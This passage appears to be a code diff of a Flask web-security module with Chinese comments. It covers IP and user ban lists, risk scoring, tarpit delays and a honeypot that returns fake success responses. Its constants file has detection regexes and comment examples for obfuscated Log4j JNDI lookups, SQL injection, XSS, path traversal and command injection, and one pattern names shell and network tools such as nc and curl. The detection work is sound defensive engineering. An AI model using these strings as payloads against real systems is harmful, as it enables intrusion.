AND (expires_at IS NULL OR expires_at > ?)
LIMIT 1
""",
(ip_text, now_str),
)
return cursor.fetchone() is not None
def is_user_banned(self, user_id: int) -> bool:
"""检查用户是否被封禁"""
if user_id is None:
return False
self._ensure_schema()
user_id_int = int(user_id)
now_str = get_cst_now_str()
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
SELECT 1
FROM user_blacklist
WHERE user_id = ?
AND is_active = 1
AND (expires_at IS NULL OR expires_at > ?)
LIMIT 1
""",
(user_id_int, now_str),
)
return cursor.fetchone() is not None
def ban_ip(self, ip: str, reason: str, duration_hours: int = 24, permanent: bool = False):
"""封禁IP"""
ip_text = str(ip or "").strip()[:64]
if not ip_text:
return False
reason_text = str(reason or "").strip()[:512]
now_str = get_cst_now_str()
expires_at: Optional[str]
if permanent:
expires_at = None
else:
hours = max(1, int(duration_hours))
expires_at = (get_cst_now() + timedelta(hours=hours)).strftime("%Y-%m-%d %H:%M:%S")
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
INSERT INTO ip_blacklist (ip, reason, is_active, added_at, expires_at)
VALUES (?, ?, 1, ?, ?)
ON CONFLICT(ip) DO UPDATE SET
reason = excluded.reason,
is_active = 1,
added_at = excluded.added_at,
expires_at = excluded.expires_at
""",
(ip_text, reason_text, now_str, expires_at),
)
conn.commit()
return True
def ban_user(self, user_id: int, reason: str):
"""封禁用户"""
return self._ban_user_internal(user_id, reason=reason, duration_hours=24, permanent=False)
def unban_ip(self, ip: str):
"""解除IP封禁"""
ip_text = str(ip or "").strip()[:64]
if not ip_text:
return False
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("UPDATE ip_blacklist SET is_active = 0 WHERE ip = ?", (ip_text,))
conn.commit()
return cursor.rowcount > 0
def unban_user(self, user_id: int):
"""解除用户封禁"""
if user_id is None:
return False
self._ensure_schema()
user_id_int = int(user_id)
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("UPDATE user_blacklist SET is_active = 0 WHERE user_id = ?", (user_id_int,))
conn.commit()
return cursor.rowcount > 0
def get_banned_ips(self) -> List[dict]:
"""获取所有被封禁的IP"""
now_str = get_cst_now_str()
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
SELECT ip, reason, is_active, added_at, expires_at
FROM ip_blacklist
WHERE is_active = 1
AND (expires_at IS NULL OR expires_at > ?)
ORDER BY added_at DESC
""",
(now_str,),
)
return [dict(row) for row in cursor.fetchall()]
def get_banned_users(self) -> List[dict]:
"""获取所有被封禁的用户"""
self._ensure_schema()
now_str = get_cst_now_str()
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
SELECT user_id, reason, is_active, added_at, expires_at
FROM user_blacklist
WHERE is_active = 1
AND (expires_at IS NULL OR expires_at > ?)
ORDER BY added_at DESC
""",
(now_str,),
)
return [dict(row) for row in cursor.fetchall()]
def cleanup_expired(self):
"""清理过期的封禁记录"""
now_str = get_cst_now_str()
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
UPDATE ip_blacklist
SET is_active = 0
WHERE is_active = 1
AND expires_at IS NOT NULL
AND expires_at <= ?
""",
(now_str,),
)
conn.commit()
self._ensure_schema()
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
UPDATE user_blacklist
SET is_active = 0
WHERE is_active = 1
AND expires_at IS NOT NULL
AND expires_at <= ?
""",
(now_str,),
)
conn.commit()
# ==================== Internal ====================
def _ensure_schema(self) -> None:
if self._schema_ready:
return
with self._schema_lock:
if self._schema_ready:
return
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS user_blacklist (
user_id INTEGER PRIMARY KEY,
reason TEXT,
is_active INTEGER DEFAULT 1,
added_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
expires_at TIMESTAMP
)
"""
)
cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_blacklist_active ON user_blacklist(is_active)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_blacklist_expires ON user_blacklist(expires_at)")
conn.commit()
self._schema_ready = True
def _ban_user_internal(
self,
user_id: int,
*,
reason: str,
duration_hours: int = 24,
permanent: bool = False,
) -> bool:
if user_id is None:
return False
self._ensure_schema()
user_id_int = int(user_id)
reason_text = str(reason or "").strip()[:512]
now_str = get_cst_now_str()
expires_at: Optional[str]
if permanent:
expires_at = None
else:
hours = max(1, int(duration_hours))
expires_at = (get_cst_now() + timedelta(hours=hours)).strftime("%Y-%m-%d %H:%M:%S")
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
INSERT INTO user_blacklist (user_id, reason, is_active, added_at, expires_at)
VALUES (?, ?, 1, ?, ?)
ON CONFLICT(user_id) DO UPDATE SET
reason = excluded.reason,
is_active = 1,
added_at = excluded.added_at,
expires_at = excluded.expires_at
""",
(user_id_int, reason_text, now_str, expires_at),
)
conn.commit()
return True

97
security/constants.py Normal file
View File

@@ -0,0 +1,97 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import annotations
import re
# ==================== Threat Types ====================
THREAT_TYPE_JNDI_INJECTION = "jndi_injection"
THREAT_TYPE_NESTED_EXPRESSION = "nested_expression"
THREAT_TYPE_SQL_INJECTION = "sql_injection"
THREAT_TYPE_XSS = "xss"
THREAT_TYPE_PATH_TRAVERSAL = "path_traversal"
THREAT_TYPE_COMMAND_INJECTION = "command_injection"
# ==================== Scores ====================
SCORE_JNDI_DIRECT = 100
SCORE_JNDI_OBFUSCATED = 100
SCORE_NESTED_EXPRESSION = 80
SCORE_SQL_INJECTION = 90
SCORE_XSS = 70
SCORE_PATH_TRAVERSAL = 60
SCORE_COMMAND_INJECTION = 85
# ==================== JNDI (Log4j) ====================
#
# - Direct: ${jndi:ldap://...} / ${jndi:rmi://...} => 100
# - Obfuscated: ${${xxx:-j}${xxx:-n}...:ldap://...} => detect
# - Nested expression: ${${...}} => 80
JNDI_DIRECT_PATTERN = r"\$\{\s*jndi\s*:\s*(?:ldap|rmi)\s*://"
# Common Log4j "default value" obfuscation variants:
# ${${::-j}${::-n}${::-d}${::-i}:ldap://...}
# ${${foo:-j}${bar:-n}${baz:-d}${qux:-i}:rmi://...}
JNDI_OBFUSCATED_PATTERN = (
r"\$\{\s*"
r"(?:\$\{[^{}]{0,50}:-j\}|\$\{::-[jJ]\})\s*"
r"(?:\$\{[^{}]{0,50}:-n\}|\$\{::-[nN]\})\s*"
r"(?:\$\{[^{}]{0,50}:-d\}|\$\{::-[dD]\})\s*"
r"(?:\$\{[^{}]{0,50}:-i\}|\$\{::-[iI]\})\s*"
r":\s*(?:ldap|rmi)\s*://"
)
NESTED_EXPRESSION_PATTERN = r"\$\{\s*\$\{"
# ==================== SQL Injection ====================
SQLI_UNION_SELECT_PATTERN = r"\bunion\b\s+(?:all\s+)?\bselect\b"
SQLI_OR_1_EQ_1_PATTERN = r"\bor\b\s+1\s*=\s*1\b"
# ==================== XSS ====================
XSS_SCRIPT_TAG_PATTERN = r"<\s*script\b"
XSS_JS_PROTOCOL_PATTERN = r"javascript\s*:"
XSS_INLINE_EVENT_HANDLER_PATTERN = r"\bon\w+\s*="
# ==================== Path Traversal ====================
PATH_TRAVERSAL_PATTERN = r"(?:\.\./|\.\.\\)+"
# ==================== Command Injection ====================
CMD_INJECTION_OPERATOR_WITH_CMD_PATTERN = (
r"(?:;|&&|\|\||\|)\s*"
r"(?:bash|sh|zsh|cmd|powershell|pwsh|curl|wget|nc|netcat|python|perl|ruby|php|node|cat|ls|id|whoami|uname|rm)\b"
)
CMD_INJECTION_SUBSHELL_PATTERN = r"(?:`[^`]{1,200}`|\$\([^)]{1,200}\))"
# ==================== Compiled Regex ====================
_FLAGS = re.IGNORECASE | re.MULTILINE
JNDI_DIRECT_RE = re.compile(JNDI_DIRECT_PATTERN, _FLAGS)
JNDI_OBFUSCATED_RE = re.compile(JNDI_OBFUSCATED_PATTERN, _FLAGS)
NESTED_EXPRESSION_RE = re.compile(NESTED_EXPRESSION_PATTERN, _FLAGS)
SQLI_UNION_SELECT_RE = re.compile(SQLI_UNION_SELECT_PATTERN, _FLAGS)
SQLI_OR_1_EQ_1_RE = re.compile(SQLI_OR_1_EQ_1_PATTERN, _FLAGS)
XSS_SCRIPT_TAG_RE = re.compile(XSS_SCRIPT_TAG_PATTERN, _FLAGS)
XSS_JS_PROTOCOL_RE = re.compile(XSS_JS_PROTOCOL_PATTERN, _FLAGS)
XSS_INLINE_EVENT_HANDLER_RE = re.compile(XSS_INLINE_EVENT_HANDLER_PATTERN, _FLAGS)
PATH_TRAVERSAL_RE = re.compile(PATH_TRAVERSAL_PATTERN, _FLAGS)
CMD_INJECTION_OPERATOR_WITH_CMD_RE = re.compile(CMD_INJECTION_OPERATOR_WITH_CMD_PATTERN, _FLAGS)
CMD_INJECTION_SUBSHELL_RE = re.compile(CMD_INJECTION_SUBSHELL_PATTERN, _FLAGS)

126
security/honeypot.py Normal file
View File

@@ -0,0 +1,126 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import annotations
import random
import uuid
from typing import Any, Optional
from app_logger import get_logger
class HoneypotResponder:
"""蜜罐响应生成器 - 返回假成功响应,欺骗攻击者"""
def __init__(self, *, rng: Optional[random.Random] = None) -> None:
self._rng = rng or random.SystemRandom()
self._logger = get_logger("app")
def generate_fake_response(self, endpoint: str, original_data: dict = None) -> dict:
"""
根据端点生成假的成功响应
策略:
- 邮件发送类: {"success": True, "message": "邮件已发送"}
- 注册类: {"success": True, "user_id": fake_uuid}
- 登录类: {"success": True} 但不设置session
- 通用: {"success": True, "message": "操作成功"}
"""
endpoint_text = str(endpoint or "").strip()
endpoint_lc = endpoint_text.lower()
category = self._classify_endpoint(endpoint_lc)
response: dict[str, Any] = {"success": True}
if category == "email":
response["message"] = "邮件已发送"
elif category == "register":
response["user_id"] = str(uuid.uuid4())
elif category == "login":
# 登录类:保持正常成功响应,但不进行任何 session / token 设置(调用方负责不写 session
pass
else:
response["message"] = "操作成功"
response = self._merge_safe_fields(response, original_data)
self._logger.warning(
"蜜罐响应已生成: endpoint=%s, category=%s, keys=%s",
endpoint_text[:256],
category,
sorted(response.keys()),
)
return response
def should_use_honeypot(self, risk_score: int) -> bool:
"""风险分>=80使用蜜罐响应"""
score = self._normalize_risk_score(risk_score)
use = score >= 80
self._logger.debug("蜜罐判定: risk_score=%s => %s", score, use)
return use
def delay_response(self, risk_score: int) -> float:
"""
根据风险分计算延迟时间
0-20: 0秒
21-50: 随机0.5-1秒
51-80: 随机1-3秒
81-100: 随机3-8秒蜜罐模式额外延迟消耗攻击者时间
"""
score = self._normalize_risk_score(risk_score)
delay = 0.0
if score <= 20:
delay = 0.0
elif score <= 50:
delay = float(self._rng.uniform(0.5, 1.0))
elif score <= 80:
delay = float(self._rng.uniform(1.0, 3.0))
else:
delay = float(self._rng.uniform(3.0, 8.0))
self._logger.debug("蜜罐延迟计算: risk_score=%s => delay_seconds=%.3f", score, delay)
return delay
# ==================== Internal ====================
def _normalize_risk_score(self, risk_score: Any) -> int:
try:
score = int(risk_score)
except Exception:
score = 0
return max(0, min(100, score))
def _classify_endpoint(self, endpoint_lc: str) -> str:
if not endpoint_lc:
return "generic"
# 先匹配更具体的:注册 / 登录
if any(k in endpoint_lc for k in ["/register", "register", "signup", "sign-up"]):
return "register"
if any(k in endpoint_lc for k in ["/login", "login", "signin", "sign-in"]):
return "login"
# 邮件相关:发送验证码 / 重置密码 / 重发验证等
if any(k in endpoint_lc for k in ["email", "mail", "forgot-password", "reset-password", "resend-verify"]):
return "email"
return "generic"
def _merge_safe_fields(self, base: dict, original_data: Optional[dict]) -> dict:
if not isinstance(original_data, dict) or not original_data:
return base
# 避免把攻击者输入或真实业务结果回显得太明显;仅合并少量“形状字段”
safe_bool_keys = {"need_verify", "need_captcha"}
merged = dict(base)
for key in safe_bool_keys:
if key in original_data and key not in merged:
try:
merged[key] = bool(original_data.get(key))
except Exception:
continue
return merged

307
security/middleware.py Normal file
View File

@@ -0,0 +1,307 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import annotations
import logging
from typing import Optional
from flask import g, jsonify, request
from flask_login import current_user
from app_logger import get_logger
from app_security import get_rate_limit_ip
from .blacklist import BlacklistManager
from .honeypot import HoneypotResponder
from .response_handler import ResponseAction, ResponseHandler, ResponseStrategy
from .risk_scorer import RiskScorer
from .threat_detector import ThreatDetector, ThreatResult
# 全局实例(保持单例,避免重复初始化开销)
detector = ThreatDetector()
blacklist = BlacklistManager()
scorer = RiskScorer(blacklist_manager=blacklist)
handler: Optional[ResponseHandler] = None
honeypot: Optional[HoneypotResponder] = None
def _get_handler() -> ResponseHandler:
global handler
if handler is None:
handler = ResponseHandler()
return handler
def _get_honeypot() -> HoneypotResponder:
global honeypot
if honeypot is None:
honeypot = HoneypotResponder()
return honeypot
def _get_security_log_level(app) -> int:
level_name = str(getattr(app, "config", {}).get("SECURITY_LOG_LEVEL", "INFO") or "INFO").upper()
return int(getattr(logging, level_name, logging.INFO))
def _log(app, level: int, message: str, *args, exc_info: bool = False) -> None:
"""按 SECURITY_LOG_LEVEL 控制安全日志输出,避免过多日志影响性能。"""
try:
logger = get_logger("app")
min_level = _get_security_log_level(app)
if int(level) >= int(min_level):
logger.log(int(level), message, *args, exc_info=exc_info)
except Exception:
# 安全模块日志故障不得影响正常请求
return
def _is_static_request(app) -> bool:
"""对静态文件请求跳过安全检查以提升性能。"""
try:
path = str(getattr(request, "path", "") or "")
except Exception:
path = ""
if path.startswith("/static/"):
return True
try:
static_url_path = getattr(app, "static_url_path", None) or "/static"
if static_url_path and path.startswith(str(static_url_path).rstrip("/") + "/"):
return True
except Exception:
pass
try:
endpoint = getattr(request, "endpoint", None)
if endpoint in {"static", "serve_static"}:
return True
except Exception:
pass
return False
def _safe_get_user_id() -> Optional[int]:
try:
if hasattr(current_user, "is_authenticated") and current_user.is_authenticated:
return getattr(current_user, "id", None)
except Exception:
return None
return None
def _scan_request_threats(req) -> list[ThreatResult]:
"""仅扫描 GET query 与 POST JSON body降低开销与误报"""
threats: list[ThreatResult] = []
try:
# 1) Query 参数(所有方法均可能携带 query string
try:
args = getattr(req, "args", None)
if args:
# MultiDict -> dict(list) 以保留多值
args_dict = args.to_dict(flat=False) if hasattr(args, "to_dict") else dict(args)
threats.extend(detector.scan_input(args_dict, "args"))
except Exception:
pass
# 2) JSON body主要针对 POST其他方法保持兼容
try:
method = str(getattr(req, "method", "") or "").upper()
except Exception:
method = ""
if method in {"POST", "PUT", "PATCH", "DELETE"}:
try:
data = req.get_json(silent=True) if hasattr(req, "get_json") else None
except Exception:
data = None
if data is not None:
threats.extend(detector.scan_input(data, "json"))
except Exception:
# 扫描失败不应阻断业务
return []
threats.sort(key=lambda t: int(getattr(t, "score", 0) or 0), reverse=True)
return threats
def init_security_middleware(app):
"""初始化安全中间件到 Flask 应用。"""
try:
scorer.auto_ban_enabled = bool(app.config.get("AUTO_BAN_ENABLED", True))
except Exception:
pass
@app.before_request
def security_check():
if not bool(app.config.get("SECURITY_ENABLED", True)):
return None
if _is_static_request(app):
return None
try:
ip = get_rate_limit_ip()
except Exception:
ip = getattr(request, "remote_addr", "") or ""
user_id = _safe_get_user_id()
# 默认值,确保后续逻辑可用
g.risk_score = 0
g.response_strategy = ResponseStrategy(action=ResponseAction.ALLOW)
g.honeypot_mode = False
g.honeypot_endpoint = None
g.honeypot_generated = False
try:
# 1) 检查黑名单(静默拒绝,返回通用错误)
try:
if blacklist.is_ip_banned(ip):
_log(app, logging.WARNING, "安全拦截: IP封禁命中 ip=%s path=%s", ip, request.path[:256])
return jsonify({"error": "服务暂时繁忙,请稍后重试"}), 503
except Exception:
_log(app, logging.ERROR, "黑名单检查失败(ip) ip=%s", ip, exc_info=True)
try:
if user_id is not None and blacklist.is_user_banned(user_id):
_log(app, logging.WARNING, "安全拦截: 用户封禁命中 user_id=%s path=%s", user_id, request.path[:256])
return jsonify({"error": "服务暂时繁忙,请稍后重试"}), 503
except Exception:
_log(app, logging.ERROR, "黑名单检查失败(user) user_id=%s", user_id, exc_info=True)
# 2) 扫描威胁GET query / POST JSON
threats = _scan_request_threats(request)
if threats:
max_threat = threats[0]
_log(
app,
logging.WARNING,
"威胁检测: ip=%s user_id=%s type=%s score=%s field=%s rule=%s",
ip,
user_id,
getattr(max_threat, "threat_type", "unknown"),
getattr(max_threat, "score", 0),
getattr(max_threat, "field_name", ""),
getattr(max_threat, "rule", ""),
)
# 记录威胁事件(异常不应阻断业务)
try:
payload = getattr(max_threat, "value_preview", "") or getattr(max_threat, "matched", "") or ""
scorer.record_threat(
ip=ip,
user_id=user_id,
threat_type=getattr(max_threat, "threat_type", "unknown"),
score=int(getattr(max_threat, "score", 0) or 0),
request_path=getattr(request, "path", None),
payload=str(payload)[:500] if payload else None,
)
except Exception:
_log(app, logging.ERROR, "威胁事件记录失败 ip=%s user_id=%s", ip, user_id, exc_info=True)
# 高危威胁启用蜜罐模式
if bool(app.config.get("HONEYPOT_ENABLED", True)):
try:
if int(getattr(max_threat, "score", 0) or 0) >= 80:
g.honeypot_mode = True
g.honeypot_endpoint = getattr(request, "endpoint", None)
except Exception:
pass
# 3) 综合风险分与响应策略
try:
risk_score = scorer.get_combined_score(ip, user_id)
except Exception:
_log(app, logging.ERROR, "风险分计算失败 ip=%s user_id=%s", ip, user_id, exc_info=True)
risk_score = 0
try:
strategy = _get_handler().get_strategy(risk_score)
except Exception:
_log(app, logging.ERROR, "响应策略计算失败 risk_score=%s", risk_score, exc_info=True)
strategy = ResponseStrategy(action=ResponseAction.ALLOW)
g.risk_score = int(risk_score or 0)
g.response_strategy = strategy
# 风险分触发蜜罐模式(兼容 ResponseHandler 的 HONEYPOT 策略)
if bool(app.config.get("HONEYPOT_ENABLED", True)):
try:
if getattr(strategy, "action", None) == ResponseAction.HONEYPOT:
g.honeypot_mode = True
except Exception:
pass
# 4) 应用延迟
try:
if float(getattr(strategy, "delay_seconds", 0) or 0) > 0:
_get_handler().apply_delay(strategy)
except Exception:
_log(app, logging.ERROR, "延迟应用失败", exc_info=True)
# 优先短路:避免业务 side effects例如发送邮件/修改状态)
if getattr(g, "honeypot_mode", False) and bool(app.config.get("HONEYPOT_ENABLED", True)):
try:
fake_payload = None
try:
fake_payload = request.get_json(silent=True)
except Exception:
fake_payload = None
fake_response = _get_honeypot().generate_fake_response(
getattr(g, "honeypot_endpoint", "default"),
fake_payload if isinstance(fake_payload, dict) else None,
)
g.honeypot_generated = True
return jsonify(fake_response), 200
except Exception:
_log(app, logging.ERROR, "蜜罐响应生成失败", exc_info=True)
return None
except Exception:
# 全局兜底:安全模块任何异常都不能阻断正常请求
_log(app, logging.ERROR, "安全中间件发生异常", exc_info=True)
return None
return None # 继续正常处理
@app.after_request
def security_response(response):
"""请求后处理 - 兜底应用蜜罐响应。"""
if not bool(app.config.get("SECURITY_ENABLED", True)):
return response
if not bool(app.config.get("HONEYPOT_ENABLED", True)):
return response
try:
if _is_static_request(app):
return response
except Exception:
pass
# 如果在 before_request 已经生成过蜜罐响应,则不再覆盖,避免丢失其他 after_request 的改动
try:
if getattr(g, "honeypot_generated", False):
return response
except Exception:
pass
try:
if getattr(g, "honeypot_mode", False):
fake_payload = None
try:
fake_payload = request.get_json(silent=True)
except Exception:
fake_payload = None
fake_response = _get_honeypot().generate_fake_response(
getattr(g, "honeypot_endpoint", "default"),
fake_payload if isinstance(fake_payload, dict) else None,
)
return jsonify(fake_response), 200
except Exception:
_log(app, logging.ERROR, "请求后蜜罐覆盖失败", exc_info=True)
return response
return response

View File

@@ -0,0 +1,131 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import annotations
import random
import time
from dataclasses import dataclass
from enum import Enum
from typing import Any, Optional
from app_logger import get_logger
class ResponseAction(Enum):
ALLOW = "allow" # 正常放行
ENHANCE_CAPTCHA = "enhance_captcha" # 增强验证码
DELAY = "delay" # 静默延迟
HONEYPOT = "honeypot" # 蜜罐响应
BLOCK = "block" # 直接拒绝
@dataclass
class ResponseStrategy:
action: ResponseAction
delay_seconds: float = 0
captcha_level: int = 1 # 1=普通4位, 2=6位, 3=滑块
message: str | None = None
class ResponseHandler:
"""响应策略处理器"""
def __init__(self, *, rng: Optional[random.Random] = None) -> None:
self._rng = rng or random.SystemRandom()
self._logger = get_logger("app")
def get_strategy(self, risk_score: int, is_banned: bool = False) -> ResponseStrategy:
"""
根据风险分获取响应策略
0-20分: ALLOW, 无延迟, 普通验证码
21-40分: ALLOW, 无延迟, 6位验证码
41-60分: DELAY, 1-2秒延迟
61-80分: DELAY, 2-5秒延迟
81-100分: HONEYPOT, 3-8秒延迟
已封禁: BLOCK
"""
score = self._normalize_risk_score(risk_score)
if is_banned:
strategy = ResponseStrategy(action=ResponseAction.BLOCK, message="访问被拒绝")
self._logger.warning("响应策略: BLOCK (banned=%s, risk_score=%s)", is_banned, score)
return strategy
if score <= 20:
strategy = ResponseStrategy(action=ResponseAction.ALLOW, delay_seconds=0, captcha_level=1)
elif score <= 40:
strategy = ResponseStrategy(action=ResponseAction.ALLOW, delay_seconds=0, captcha_level=2)
elif score <= 60:
strategy = ResponseStrategy(action=ResponseAction.DELAY, delay_seconds=float(self._rng.uniform(1.0, 2.0)))
elif score <= 80:
strategy = ResponseStrategy(action=ResponseAction.DELAY, delay_seconds=float(self._rng.uniform(2.0, 5.0)))
else:
strategy = ResponseStrategy(action=ResponseAction.HONEYPOT, delay_seconds=float(self._rng.uniform(3.0, 8.0)))
strategy.captcha_level = self._normalize_captcha_level(strategy.captcha_level)
self._logger.info(
"响应策略: action=%s risk_score=%s delay=%.3f captcha_level=%s",
strategy.action.value,
score,
float(strategy.delay_seconds or 0),
int(strategy.captcha_level),
)
return strategy
def apply_delay(self, strategy: ResponseStrategy):
"""应用延迟使用time.sleep"""
if strategy is None:
return
delay = 0.0
try:
delay = float(getattr(strategy, "delay_seconds", 0) or 0)
except Exception:
delay = 0.0
if delay <= 0:
return
self._logger.debug("应用延迟: action=%s delay=%.3f", getattr(strategy.action, "value", strategy.action), delay)
time.sleep(delay)
def get_captcha_requirement(self, strategy: ResponseStrategy) -> dict:
"""返回验证码要求 {"required": True, "level": 2}"""
level = 1
try:
level = int(getattr(strategy, "captcha_level", 1) or 1)
except Exception:
level = 1
level = self._normalize_captcha_level(level)
required = True
try:
required = getattr(strategy, "action", None) != ResponseAction.BLOCK
except Exception:
required = True
payload = {"required": bool(required), "level": level}
self._logger.debug("验证码要求: %s", payload)
return payload
# ==================== Internal ====================
def _normalize_risk_score(self, risk_score: Any) -> int:
try:
score = int(risk_score)
except Exception:
score = 0
return max(0, min(100, score))
def _normalize_captcha_level(self, level: Any) -> int:
try:
i = int(level)
except Exception:
i = 1
if i <= 1:
return 1
if i == 2:
return 2
return 3

362
security/risk_scorer.py Normal file
View File

@@ -0,0 +1,362 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import annotations
import math
from dataclasses import dataclass
from datetime import timedelta
from typing import Optional
import db_pool
from db.utils import get_cst_now, get_cst_now_str, parse_cst_datetime
from . import constants as C
from .blacklist import BlacklistManager
@dataclass(frozen=True)
class _ScoreUpdateResult:
ip_score: int
user_score: int
@dataclass(frozen=True)
class _BanAction:
reason: str
duration_hours: Optional[int] = None
permanent: bool = False
class RiskScorer:
"""风险评分引擎 - 计算IP和用户的风险分数"""
def __init__(
self,
*,
auto_ban_enabled: bool = True,
auto_ban_duration_hours: int = 24,
high_risk_threshold: int = 80,
high_risk_window_hours: int = 1,
high_risk_permanent_ban_count: int = 3,
blacklist_manager: Optional[BlacklistManager] = None,
) -> None:
self.auto_ban_enabled = bool(auto_ban_enabled)
self.auto_ban_duration_hours = max(1, int(auto_ban_duration_hours))
self.high_risk_threshold = max(0, int(high_risk_threshold))
self.high_risk_window_hours = max(1, int(high_risk_window_hours))
self.high_risk_permanent_ban_count = max(1, int(high_risk_permanent_ban_count))
self.blacklist = blacklist_manager or BlacklistManager()
def get_ip_score(self, ip_address: str) -> int:
"""获取IP风险分(0-100),从数据库读取"""
ip_text = str(ip_address or "").strip()[:64]
if not ip_text:
return 0
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("SELECT risk_score FROM ip_risk_scores WHERE ip = ?", (ip_text,))
row = cursor.fetchone()
if not row:
return 0
try:
return max(0, min(100, int(row["risk_score"])))
except Exception:
return 0
def get_user_score(self, user_id: int) -> int:
"""获取用户风险分(0-100)"""
if user_id is None:
return 0
user_id_int = int(user_id)
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("SELECT risk_score FROM user_risk_scores WHERE user_id = ?", (user_id_int,))
row = cursor.fetchone()
if not row:
return 0
try:
return max(0, min(100, int(row["risk_score"])))
except Exception:
return 0
def get_combined_score(self, ip: str, user_id: int = None) -> int:
"""综合风险分 = max(IP分, 用户分) + 行为加成"""
base = max(self.get_ip_score(ip), self.get_user_score(user_id) if user_id is not None else 0)
bonus = self._get_behavior_bonus(ip, user_id)
return max(0, min(100, int(base + bonus)))
def record_threat(
self,
ip: str,
user_id: int,
threat_type: str,
score: int,
request_path: str = None,
payload: str = None,
):
"""记录威胁事件到数据库并更新IP/用户风险分"""
ip_text = str(ip or "").strip()[:64]
user_id_int = int(user_id) if user_id is not None else None
threat_type_text = str(threat_type or "").strip()[:64] or "unknown"
score_int = max(0, int(score))
path_text = str(request_path or "").strip()[:512] if request_path else None
payload_text = str(payload or "").strip() if payload else None
if payload_text and len(payload_text) > 2048:
payload_text = payload_text[:2048]
now_str = get_cst_now_str()
ip_ban_action: Optional[_BanAction] = None
user_ban_action: Optional[_BanAction] = None
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
INSERT INTO threat_events (
threat_type, score, ip, user_id, request_path, value_preview, created_at
) VALUES (?, ?, ?, ?, ?, ?, ?)
""",
(
threat_type_text,
score_int,
ip_text or None,
user_id_int,
path_text,
payload_text,
now_str,
),
)
update = self._update_scores(cursor, ip_text, user_id_int, score_int, now_str)
if self.auto_ban_enabled:
ip_ban_action, user_ban_action = self._get_auto_ban_actions(
cursor,
ip_text,
user_id_int,
threat_type_text,
score_int,
update,
)
conn.commit()
if not self.auto_ban_enabled:
return
if ip_ban_action and ip_text:
self.blacklist.ban_ip(
ip_text,
reason=ip_ban_action.reason,
duration_hours=ip_ban_action.duration_hours or self.auto_ban_duration_hours,
permanent=ip_ban_action.permanent,
)
if user_ban_action and user_id_int is not None:
self.blacklist._ban_user_internal(
user_id_int,
reason=user_ban_action.reason,
duration_hours=user_ban_action.duration_hours or self.auto_ban_duration_hours,
permanent=user_ban_action.permanent,
)
def decay_scores(self):
"""风险分衰减 - 定期调用,降低历史风险分"""
now = get_cst_now()
now_str = now.strftime("%Y-%m-%d %H:%M:%S")
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("SELECT ip, risk_score, updated_at, created_at FROM ip_risk_scores")
for row in cursor.fetchall():
ip = row["ip"]
current_score = int(row["risk_score"] or 0)
updated_at = row["updated_at"] or row["created_at"]
hours = self._hours_since(updated_at, now)
if hours <= 0:
continue
new_score = self._apply_hourly_decay(current_score, hours)
if new_score == current_score:
continue
cursor.execute(
"UPDATE ip_risk_scores SET risk_score = ?, updated_at = ? WHERE ip = ?",
(new_score, now_str, ip),
)
cursor.execute("SELECT user_id, risk_score, updated_at, created_at FROM user_risk_scores")
for row in cursor.fetchall():
user_id = int(row["user_id"])
current_score = int(row["risk_score"] or 0)
updated_at = row["updated_at"] or row["created_at"]
hours = self._hours_since(updated_at, now)
if hours <= 0:
continue
new_score = self._apply_hourly_decay(current_score, hours)
if new_score == current_score:
continue
cursor.execute(
"UPDATE user_risk_scores SET risk_score = ?, updated_at = ? WHERE user_id = ?",
(new_score, now_str, user_id),
)
conn.commit()
def _update_ip_score(self, ip: str, score_delta: int):
"""更新IP风险分"""
ip_text = str(ip or "").strip()[:64]
if not ip_text:
return
delta = int(score_delta)
now_str = get_cst_now_str()
with db_pool.get_db() as conn:
cursor = conn.cursor()
self._update_scores(cursor, ip_text, None, delta, now_str)
conn.commit()
def _update_user_score(self, user_id: int, score_delta: int):
"""更新用户风险分"""
if user_id is None:
return
user_id_int = int(user_id)
delta = int(score_delta)
now_str = get_cst_now_str()
with db_pool.get_db() as conn:
cursor = conn.cursor()
self._update_scores(cursor, "", user_id_int, delta, now_str)
conn.commit()
def _update_scores(
self,
cursor,
ip: str,
user_id: Optional[int],
score_delta: int,
now_str: str,
) -> _ScoreUpdateResult:
ip_score = 0
user_score = 0
if ip:
cursor.execute("SELECT risk_score FROM ip_risk_scores WHERE ip = ?", (ip,))
row = cursor.fetchone()
current = int(row["risk_score"]) if row else 0
ip_score = max(0, min(100, current + int(score_delta)))
if row:
cursor.execute(
"UPDATE ip_risk_scores SET risk_score = ?, last_seen = ?, updated_at = ? WHERE ip = ?",
(ip_score, now_str, now_str, ip),
)
else:
cursor.execute(
"""
INSERT INTO ip_risk_scores (ip, risk_score, last_seen, created_at, updated_at)
VALUES (?, ?, ?, ?, ?)
""",
(ip, ip_score, now_str, now_str, now_str),
)
if user_id is not None:
cursor.execute("SELECT risk_score FROM user_risk_scores WHERE user_id = ?", (int(user_id),))
row = cursor.fetchone()
current = int(row["risk_score"]) if row else 0
user_score = max(0, min(100, current + int(score_delta)))
if row:
cursor.execute(
"UPDATE user_risk_scores SET risk_score = ?, last_seen = ?, updated_at = ? WHERE user_id = ?",
(user_score, now_str, now_str, int(user_id)),
)
else:
cursor.execute(
"""
